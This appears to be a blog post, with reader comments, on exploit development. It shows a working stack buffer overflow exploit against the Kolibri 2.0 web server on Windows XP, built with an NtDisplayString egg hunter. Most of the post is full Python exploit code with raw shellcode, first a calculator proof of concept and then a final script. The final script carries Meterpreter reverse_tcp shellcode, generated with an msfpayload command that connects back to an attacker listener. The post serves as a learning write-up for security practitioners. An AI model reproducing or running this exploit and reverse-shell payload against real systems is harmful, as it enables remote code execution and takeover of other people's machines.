In this vacation IĀ thoughtĀ of learning to use egg hunters in exploit development. This is just a small write up just after successful exploitation of my meterpreterĀ reverse_tcpĀ shellcode. This is the original exploit which was published in 2010 http://www.exploit-db.com/exploits/15834/. I wanted to implement a egg hunter code to search our shellcode with our tag throughout the heap, stack, etc. Egg hunters are used when we have a limited buffer space.
Download the vulnerable Kalbri server: http://www.exploit-db.com/wp-content/themes/exploit/applications/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip
I assume you have a good knowledge on developing stack based buffer overflow exploits, about registers, little-endianness,etc which is the very basics.
I developed this exploit under Windows XP SP2 using the USER32.dll which is a operating system dll to find a jump to esp (JMP ESP) command. This application doesn’t use any dlls so this is a platform dependent exploit.
As I mentioned earlier this is very brief Ā write up. Ā The offset is at 515 bytes . Our plan is toĀ overwriteĀ the EIP register with our JMP ESP address and we want jump back 60 bytes backwards to the starting point of our hunter so that it would be executed. Then it would search everywhere inside theĀ memory to find the tag and execute our shellcode. Opcode for jmp is EB and 60 bytes back means -60 is C4 so the shellcode would be \xeb\xc4.
I will be using anĀ Egg hunter using NtDisplayString. The size of our Egg hunter is of 32 bytes and of course the egg size is 8 bytes.
[code language=”python”]
6681CAFF0F or dx,0x0fff
42 inc edx
52 push edx
6A43 push byte +0x43
58 pop eax
CD2E int 0x2e
3C05 cmp al,0x5
5A pop edx
74EF jz 0x0
B86f736361 mov eax,0x6f736361; Our tag osca
8BFA mov edi,edx
AF scasd
75EA jnz 0x5
AF scasd
75E7 jnz 0x5
FFE7 jmp edi
[/code]
So the shellcode for the above egg hunter would be:
[code source=”python”]
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8" + "osca" + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
[/code]
This is my proof of concept calculator exploit code.
[code language=”python”]
#!/usr/bin/python
import socket
import os
import sys
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
#Our Tag of the egghunter is oscar which is "\x6f\x73\x63\x61" in hex
shellcode=(
"\x89\xe6\xda\xc9\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x48\x68\x6d\x59\x55\x50\x33\x30\x37\x70\x43\x50\x4c\x49"
"\x38\x65\x46\x51\x6a\x72\x33\x54\x6c\x4b\x51\x42\x74\x70\x6e"
"\x6b\x51\x42\x36\x6c\x6e\x6b\x53\x62\x67\x64\x4e\x6b\x43\x42"
"\x54\x68\x46\x6f\x78\x37\x70\x4a\x34\x66\x34\x71\x6b\x4f\x35"
"\x61\x4b\x70\x6c\x6c\x67\x4c\x73\x51\x63\x4c\x74\x42\x34\x6c"
"\x75\x70\x39\x51\x78\x4f\x56\x6d\x43\x31\x48\x47\x58\x62\x58"
"\x70\x32\x72\x32\x77\x6c\x4b\x50\x52\x52\x30\x6e\x6b\x30\x42"
"\x57\x4c\x46\x61\x58\x50\x4e\x6b\x33\x70\x30\x78\x6d\x55\x59"
"\x50\x30\x74\x32\x6a\x35\x51\x6e\x30\x76\x30\x6e\x6b\x63\x78"
"\x56\x78\x4c\x4b\x63\x68\x75\x70\x56\x61\x59\x43\x78\x63\x55"
"\x6c\x72\x69\x6c\x4b\x74\x74\x4e\x6b\x73\x31\x6a\x76\x54\x71"
"\x49\x6f\x46\x51\x39\x50\x6c\x6c\x59\x51\x6a\x6f\x76\x6d\x47"
"\x71\x7a\x67\x70\x38\x59\x70\x34\x35\x79\x64\x54\x43\x31\x6d"
"\x58\x78\x75\x6b\x31\x6d\x37\x54\x51\x65\x6d\x32\x43\x68\x4c"
"\x4b\x72\x78\x44\x64\x65\x51\x39\x43\x43\x56\x6e\x6b\x64\x4c"
"\x32\x6b\x6c\x4b\x56\x38\x57\x6c\x47\x71\x58\x53\x4c\x4b\x56"
"\x64\x6c\x4b\x37\x71\x78\x50\x4e\x69\x33\x74\x76\x44\x37\x54"
"\x31\x4b\x61\x4b\x43\x51\x31\x49\x70\x5a\x56\x31\x6b\x4f\x39"
"\x70\x71\x48\x71\x4f\x62\x7a\x4e\x6b\x62\x32\x7a\x4b\x4b\x36"
"\x33\x6d\x61\x7a\x35\x51\x4c\x4d\x6e\x65\x38\x39\x47\x70\x37"
"\x70\x33\x30\x46\x30\x33\x58\x76\x51\x4c\x4b\x62\x4f\x6c\x47"
"\x79\x6f\x58\x55\x4d\x6b\x68\x70\x6e\x55\x79\x32\x66\x36\x71"
"\x78\x39\x36\x5a\x35\x4f\x4d\x6f\x6d\x39\x6f\x38\x55\x65\x6c"
"\x63\x36\x33\x4c\x66\x6a\x4d\x50\x49\x6b\x49\x70\x34\x35\x64"
"\x45\x4d\x6b\x47\x37\x47\x63\x73\x42\x62\x4f\x30\x6a\x73\x30"
"\x72\x73\x79\x6f\x79\x45\x43\x53\x53\x51\x52\x4c\x32\x43\x76"
"\x4e\x35\x35\x31\x68\x72\x45\x75\x50\x41\x41")
junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 – USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"
exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode
buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8080)) #If you want to exploit this locally use the localhost of not you can exploit this remotely with the external ip and port 8080 š
s.send(buffer)
s.close()
[/code]
As you see above we were able to do remote code execution using our egg hunter š
Okay time to get a reverse shell and own the system š I will be using a MeterpreterĀ reverse_tcpĀ shellcode as it is kind of fast and has more options to deal with Metasploit instead of aĀ traditionalĀ connect back shell.
[code language=”cpp”]msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 R | msfencode -e x86/alpha_mixed -t c[/code]
This is our final exploit with our reverse shell.
[code language=”python”]
#!/usr/bin/python
import socket
import os
import sys
print """
\t—————————————–
\t\033[39m+ Kolibri Web Server Egg Hunter Exploit +
\t\033[37m+ Exploit Developed for Windows XP SP2 +
\t\033[31m+ JMP ESP from USER32.dll +
\t\033[37m+ Exploit Developed by Osanda Malith +
\t——————————————
"""
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
#Our Tag of the egghunter is oscar which is "\x6f\x73\x63\x61" in hex
shellcode=(
"\x89\xe0\xd9\xe8\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x4b\x58\x4c\x49\x35\x50\x65\x50\x65\x50\x33\x50\x4c"
"\x49\x38\x65\x64\x71\x6a\x72\x51\x74\x4e\x6b\x61\x42\x64\x70"
"\x4e\x6b\x56\x32\x36\x6c\x6c\x4b\x76\x32\x55\x44\x4c\x4b\x72"
"\x52\x55\x78\x46\x6f\x4d\x67\x33\x7a\x34\x66\x54\x71\x4b\x4f"
"\x30\x31\x69\x50\x4c\x6c\x45\x6c\x30\x61\x31\x6c\x45\x52\x56"
"\x4c\x47\x50\x6b\x71\x38\x4f\x66\x6d\x63\x31\x79\x57\x58\x62"
"\x6c\x30\x71\x42\x31\x47\x4e\x6b\x36\x32\x36\x70\x4e\x6b\x30"
"\x42\x57\x4c\x57\x71\x78\x50\x6c\x4b\x77\x30\x74\x38\x4e\x65"
"\x6b\x70\x34\x34\x31\x5a\x66\x61\x48\x50\x36\x30\x6c\x4b\x73"
"\x78\x34\x58\x4c\x4b\x61\x48\x71\x30\x65\x51\x6e\x33\x78\x63"
"\x75\x6c\x30\x49\x6c\x4b\x74\x74\x6e\x6b\x37\x71\x59\x46\x46"
"\x51\x49\x6f\x35\x61\x6f\x30\x4c\x6c\x6a\x61\x5a\x6f\x44\x4d"
"\x73\x31\x6a\x67\x36\x58\x6d\x30\x73\x45\x59\x64\x35\x53\x61"
"\x6d\x4c\x38\x55\x6b\x73\x4d\x57\x54\x62\x55\x5a\x42\x46\x38"
"\x4c\x4b\x51\x48\x37\x54\x73\x31\x59\x43\x71\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x72\x78\x45\x4c\x76\x61\x78\x53\x4c\x4b"
"\x33\x34\x6e\x6b\x67\x71\x4e\x30\x4e\x69\x43\x74\x51\x34\x57"
"\x54\x43\x6b\x33\x6b\x53\x51\x72\x79\x53\x6a\x33\x61\x6b\x4f"
"\x49\x70\x70\x58\x43\x6f\x53\x6a\x6e\x6b\x54\x52\x68\x6b\x4f"
"\x76\x73\x6d\x43\x58\x37\x43\x34\x72\x65\x50\x77\x70\x52\x48"
"\x74\x37\x54\x33\x74\x72\x31\x4f\x51\x44\x70\x68\x32\x6c\x64"
"\x37\x34\x66\x46\x67\x6b\x4f\x48\x55\x6c\x78\x4e\x70\x47\x71"
"\x77\x70\x73\x30\x74\x69\x7a\x64\x36\x34\x52\x70\x53\x58\x35"
"\x79\x6f\x70\x50\x6b\x57\x70\x79\x6f\x78\x55\x72\x70\x46\x30"
"\x46\x30\x42\x70\x73\x70\x62\x70\x63\x70\x66\x30\x51\x78\x68"
"\x6a\x76\x6f\x59\x4f\x39\x70\x39\x6f\x38\x55\x4a\x37\x32\x4a"
"\x46\x65\x71\x78\x59\x50\x79\x38\x37\x71\x52\x44\x42\x48\x33"
"\x32\x37\x70\x52\x31\x51\x4c\x4e\x69\x5a\x46\x30\x6a\x54\x50"
"\x46\x36\x73\x67\x31\x78\x4f\x69\x49\x35\x43\x44\x65\x31\x69"
"\x6f\x4e\x35\x4e\x65\x4f\x30\x51\x64\x64\x4c\x39\x6f\x72\x6e"
"\x75\x58\x63\x45\x7a\x4c\x63\x58\x6a\x50\x6f\x45\x69\x32\x72"
"\x76\x6b\x4f\x38\x55\x50\x6a\x77\x70\x73\x5a\x33\x34\x30\x56"
"\x62\x77\x73\x58\x44\x42\x6e\x39\x59\x58\x53\x6f\x6b\x4f\x6e"
"\x35\x6c\x4b\x47\x46\x51\x7a\x33\x70\x71\x78\x53\x30\x64\x50"
"\x43\x30\x67\x70\x42\x76\x70\x6a\x47\x70\x35\x38\x61\x48\x6f"
"\x54\x63\x63\x4a\x45\x59\x6f\x5a\x75\x4a\x33\x71\x43\x62\x4a"
"\x45\x50\x52\x76\x70\x53\x46\x37\x33\x58\x75\x52\x5a\x79\x6a"
"\x68\x61\x4f\x69\x6f\x7a\x75\x35\x51\x78\x43\x37\x59\x49\x56"
"\x4e\x65\x4a\x56\x74\x35\x6a\x4c\x69\x53\x41\x41")
junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 – USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"
#"\xcc" +"\xEB\xc4"
exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode
buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 172.16.71.135:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((‘172.16.71.135’, 8080)) #If you want to exploit this locally use the localhost of not you can exploit this remotely with the external ip and port 8080 š
print ‘[+] Sending Evil Payload’
s.send(buffer)
s.close
print ‘\033[33m[+] Successfuly Exploited the Buffer Overflow’
except:
print "[-] Can’t send evil buffer"
sys.exit(0)
[/code]
That’s it we are in š here is the output of the cool screenshot command by our Meterpreter shell of our Win XP machine.
Egg hunting is fun isn’t it? It took me about an hour figuring out this theory and developing this exploit from the scratch. You could also give it a try by reading my example code. But I am sorry that I haven’t explained anything from the beginning because this is just small write up for the people who are in this field. I will sure start to write detailed articles on exploit developing if I get some more free time. Actually exploit developing need lots of patience š
I made a quick video to celebrate my happiness after getting a nice little shell ^_^
[youtube=http://www.youtube.com/watch?v=XiTr2qsiZL8&feature=youtu.be]
Here is a good research paper by skape about egg hunting:Ā http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
As always respectĀ Peter Van Eeckhoutte (corelanc0d3r) for his tutorials and exploits.
Great video (Y) keep it up
Nice One Bro , You got the talent
nice tutorial osa can’t explain its values in words
Nice one bro. Keep up your good work š
Thank you all for the comments! š
Nice Work Bro
Nice job and good write up coverage on things! Looking forward to more to come š
Thanks ! Sure I’ll post more in my leisure time š
Thanks for the comment!